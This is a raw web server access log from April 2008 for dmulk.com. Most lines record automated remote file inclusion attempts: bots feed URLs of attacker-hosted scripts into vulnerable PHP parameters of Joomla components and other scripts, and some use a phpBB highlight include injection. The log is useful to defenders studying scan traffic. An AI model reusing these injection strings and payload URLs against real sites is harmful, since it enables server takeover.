67.228.55.26 - - [23/Apr/2008:10:43:23 -0700] "GET /logs/access_080201.log/?rootSys=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.179.90.54 - - [23/Apr/2008:10:43:24 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:43:27 -0700] "GET /?rootSys=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:43:28 -0700] "GET /logs/?rootSys=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
64.179.90.54 - - [23/Apr/2008:10:43:30 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:43:33 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:43:33 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:43:33 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:44:12 -0700] "GET /logs/access_080308.log/?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:44:15 -0700] "GET /?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:44:16 -0700] "GET /logs/?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:10:44:19 -0700] "GET /logs/?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:19 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:20 -0700] "GET //config.inc.php?path_escape=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:20 -0700] "GET /logs//config.inc.php?path_escape=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:22 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:22 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:22 -0700] "GET //config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:23 -0700] "GET //config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:23 -0700] "GET /logs//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:23 -0700] "GET //config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:24 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:10:44:24 -0700] "GET /?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11602 "-" "libwww-perl/5.810" "dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:26 -0700] "GET /logs//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:29 -0700] "GET /logs//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:34 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:35 -0700] "GET //config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:38 -0700] "GET /logs//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:44:42 -0700] "GET /logs/access_080329.log/?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:44:43 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:54 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:44:54 -0700] "GET //config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:10:44:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://lunk.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:45:00 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:45:00 -0700] "GET /logs//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:45:01 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:45:14 -0700] "GET /?rootSys=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:10:45:40 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://lunk.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
85.195.123.24 - - [23/Apr/2008:10:46:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
85.195.123.24 - - [23/Apr/2008:10:46:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:46:09 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:46:14 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:46:19 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:46:19 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:46:25 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:46:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:46:26 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:46:29 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:46:29 -0700] "GET //main.php?sayfa=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:46:29 -0700] "GET /logs//main.php?sayfa=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:46:48 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:47:21 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:47:26 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:47:26 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:47:27 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.112.121 - - [23/Apr/2008:10:47:37 -0700] "GET /logs/access_080117.log//admin/index.php?o=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.112.121 - - [23/Apr/2008:10:47:38 -0700] "GET //admin/index.php?o=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.112.121 - - [23/Apr/2008:10:47:38 -0700] "GET /logs//admin/index.php?o=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:47:44 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.118.170.87 - - [23/Apr/2008:10:47:49 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:48:21 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:48:21 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:48:21 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:48:45 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:00 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:00 -0700] "GET //main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:01 -0700] "GET /logs//main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:49:09 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:49:30 -0700] "GET /logs/access_080315.log//db.php?commonpath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:49:31 -0700] "GET //db.php?commonpath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:49:31 -0700] "GET /logs//db.php?commonpath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:45 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:45 -0700] "GET //main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:49:45 -0700] "GET /logs//main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:49:50 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:10:49:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://lunk.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.6.25.154 - - [23/Apr/2008:10:50:00 -0700] "GET /logs/access_071207.log HTTP/1.0" 200 248258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:50:04 -0700] "GET /?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:10:50:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [23/Apr/2008:10:50:26 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://gemblog.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:10:50:31 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:10:50:31 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:10:50:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:50:32 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:50:50 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.123.207.130 - - [23/Apr/2008:10:51:12 -0700] "GET /logs/access_080224.log//init_basic.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.123.207.130 - - [23/Apr/2008:10:51:12 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.123.207.130 - - [23/Apr/2008:10:51:13 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:10:51:25 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:51:26 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:52:19 -0700] "GET /logs/access.log/?confdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:52:21 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:52:22 -0700] "GET /?confdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:52:24 -0700] "GET /logs/?confdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
209.121.50.114 - - [23/Apr/2008:10:52:26 -0700] "GET //main.php?sayfa=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:10:52:26 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.7.194 - - [23/Apr/2008:10:53:01 -0700] "GET /logs/access.log/!scanhttp://www.cyos.co.kr/bbs/data1/comment?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Apr/2008:10:53:02 -0700] "GET /!scanhttp://www.cyos.co.kr/bbs/data1/comment?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [23/Apr/2008:10:53:03 -0700] "GET /logs/!scanhttp://www.cyos.co.kr/bbs/data1/comment?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:10:53:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:10:53:21 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.173.72 - - [23/Apr/2008:10:53:22 -0700] "GET /logs/access.log/!scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [23/Apr/2008:10:53:23 -0700] "GET /!scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [23/Apr/2008:10:53:23 -0700] "GET /logs/!scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:53:59 -0700] "GET /logs/access.log/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:54:00 -0700] "GET /logs/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:10:54:04 -0700] "GET /logs/access.log/index.php?Sayfa=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:54:05 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:54:05 -0700] "GET /activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:54:05 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:10:54:07 -0700] "GET /index.php?Sayfa=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:10:54:07 -0700] "GET /logs/index.php?Sayfa=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:10:54:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:54:08 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:54:41 -0700] "GET /home.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:54:41 -0700] "GET /logs/home.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "dmulk.com"
89.111.176.20 - - [23/Apr/2008:10:54:42 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:10:54:49 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:10:55:01 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://forsalebyowner.com.au/adpics/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:10:55:01 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://forsalebyowner.com.au/adpics/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:10:55:01 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://forsalebyowner.com.au/adpics/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:10:55:13 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
